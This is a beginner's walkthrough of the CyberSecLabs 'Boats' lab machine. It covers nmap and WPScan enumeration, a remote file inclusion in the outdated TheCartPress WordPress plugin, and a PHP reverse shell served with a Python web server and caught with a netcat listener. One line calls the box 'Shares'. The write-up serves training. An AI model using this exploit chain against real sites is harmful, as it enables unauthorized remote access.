This is my third write up and I will be discussing my experience with the machine “Boats” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing. Shares was a pretty easy Windows box. A WordPress plugin thecartpress was found vulnerable leading to a Remote File Inclusion(RFI).
Step 1: Enumeration
Kicked off with a Nmap scan and jumped right in. My first scan used default scripts -sC and version detection -sV. The second scan pretty much gave me similar results.
sudo nmap -sC -sV 172.31.1.14
I always start from top to bottom when looking into my ports and reading my results. I visited the webpage and ran some web enumeration scans and found nothing interesting. Going back to my Nmap scan results the WordPress version 4.0.1 caught my attention. I ran WPScan which is a great tool baked into Kali that scans for WordPress vulnerabilities.
sudo wpscan -- url http://172.31.1.14/
Looking at my scan results I noticed that the thecartpress plugin was outdated.
Step 2: Exploitation
I then googled the plugin name thecartpress along with the word exploit and bam!
Offensive Security's Exploit Database Archive
Exploit Title: Thecartpress Wordpress plugin RFI # Google Dork: inurl:wp-content/plugins/thecartpress # Date…
Looking at the exploit I appended this path to the URL http://172.31.1.14/
I noticed the error presenting the Remote File Inclusion(RFI).
My focus was beamed on the variable tcp_class_path in our URL because this is where I would make a call to the file we want to grab off our machine and run.
Well, I know this machine runs PHP on Windows so I googled for a windows php reverse shell and found this bad boy on GitHub.
Simple php reverse shell implemented using binary , based on an webshell . Usage : change the ip and port in the…
Cloned the shell onto my machine and opened up the file with Vim and changed the IP to the one assigned to my tun0 adapter.
Next, I needed to get netcat running to receive an incoming connection from the shell and python simple server so I could serve up my shell. You need to make sure that when you serve up the shell file that it is in the same directory you run the python simple server from.
First terminal window:
nc -lvp 1234
Second Terminal Window:
sudo python -m SimpleHTTPServer 80
Going back to my Kali box my netcat presented the reverse connection giving me access to the victim machine as Admin.